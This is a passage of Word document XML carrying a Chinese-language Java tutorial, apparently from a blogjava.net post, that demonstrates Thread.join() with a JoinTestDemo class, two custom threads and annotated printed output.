          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> JoinTestDemo {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43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="457" name="Codehighlighter1_1366_1899_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_1366_1899_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> main(String[] args) {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44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="458" name="图片 46"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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String threadName = Thread.currentThread().getName();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45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="459" name="图片 47"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println(threadName + " start.");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46</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="460" name="图片 48"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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CustomThread1 t1 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> CustomThread1();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47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="461" name="图片 49"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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CustomThread t = </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> CustomThread(t1);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48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="462" name="Codehighlighter1_1604_1744_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_1604_1744_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> {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49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="463" name="图片 51"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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t1.start();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50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="464" name="图片 52"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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Thread.sleep(2000);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51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="465" name="图片 53"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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t.start();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52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="466" name="图片 54"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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t.join();</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在代碼</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>里，將此處注釋掉</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="008080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="467" name="Codehighlighter1_1766_1837_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSub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highlighter1_1766_1837_Open_Image" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockStart.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId139"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (Exception e) {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54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="468" name="图片 56"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println("Exception from main");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55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="469" name="图片 57" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="470" name="图片 58"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www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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System.out.println(threadName + " end!");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57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="471" name="图片 59" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="472" name="图片 60" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00FE3CD0" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="240" w:line="212" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pP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打印结果：</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 </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main start.//main</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法所在的线程起动，但没有马上结束，因为调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t.join();</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，所以要等到</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>结束了，此线程才能向下执行。</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[CustomThread1] Thread start.//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>起动</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[CustomThread1] Thread loop at 0//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>执行</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[CustomThread1] Thread loop at 1//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>执行</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lastRenderedPageBreak/>
        <w:t>[CustomThread] Thread start.//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CustomThread</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>起动，但没有马上结束，因为调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t1.join();</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，所以要等到</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
